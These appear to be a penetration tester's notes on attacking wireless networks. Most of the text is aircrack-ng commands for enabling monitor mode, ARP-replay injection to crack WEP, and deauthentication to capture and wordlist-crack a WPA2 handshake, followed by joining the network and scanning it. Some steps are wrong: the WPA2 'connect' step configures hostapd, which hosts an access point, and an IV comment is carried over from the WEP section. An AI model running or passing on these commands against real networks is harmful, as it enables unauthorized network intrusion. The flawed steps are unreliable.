Wireless Attacks

- Below are very important steps prior to any pen testing

 

List interfaces:  (2 ways)

1- iw dev

 

 

2- iwconfig

 

Monitor Mode: (2 ways)

1- airmon-ng start wlan0

 

2- ifconfig <interface> down

  iw dev <interface> set monitor none

  ifconfig <interface> up

 

Check and Kill:

airmon-ng check

airmon-ng check kill

 

WEP Live Cracking 

- need to capture many IV packets

 

airodump-ng wlan0 #ensure the interface name has not changed

airodump-ng --bssid B8:0D:F7:D5:79:F9 -c 6 wlan0mon #bssid and channel for specific capture, add -w for output

aireplay-ng -3 -b B8:0D:F7:D5:79:F9 -h 02:00:00:00:09:00 wlan0 #-3 = ARP -b=bssid -h=source mac 

aircrack-ng filename.cap # use aircrack once you have enough IVs

 

To connect to the network with found key:

- use wpa supplicant - first create a .conf file, then connect

- Note you must start this on a different wireless interface 

 

network={
ssid="enter name of network"
key_mgmt=NONE
wep_key0="enter password/key"
wep_tx_keyidx=0
}

 

wpa_supplicant -B -Dnl80211 -iwlan1 -c <conf file name>  # -B = background -D = driver (it is normally nl80211) -i = interface -c = conf file

 

 

to get IP address of the new interface you started

 

dhclient -v wlan1 # you can then scan with nmap

 

 

WPA2 Live Cracking 

- getting the 4 way handshake

 

 

airodump-ng wlan0 #ensure the interface name has not changed

airodump-ng --bssid B8:0D:F7:D5:79:F9 -c 6 wlan0mon -w <outputfilename> #bssid and channel for specific capture, add -w for output

aireplay-ng -0 <number of deauth packs> -a B8:0D:F7:D5:79:F9 -c 02:00:00:00:09:00 wlan0 #-0 <no. of deauth packs> = deauth -a=bssid (can use -e followed by name of network)> -c =destination mac  

aircrack-ng filename.cap -w <wordlist to crack> # use aircrack once you have enough IVs - need a wordlist to crack

 

To connect to the network with found passphrase:

- use hostapd - first create a .conf file, then connect

- Note you must start this on a different wireless interface 

 

interface=wlan0
driver=nl80211
ssid=<enter name>
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=<enter passphrase/key>
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

 

# airmon-ng check kill #if needed

iwconfig wlan0 mode monitor

ifconfig wlan0 up

hostapd ./hostapd.conf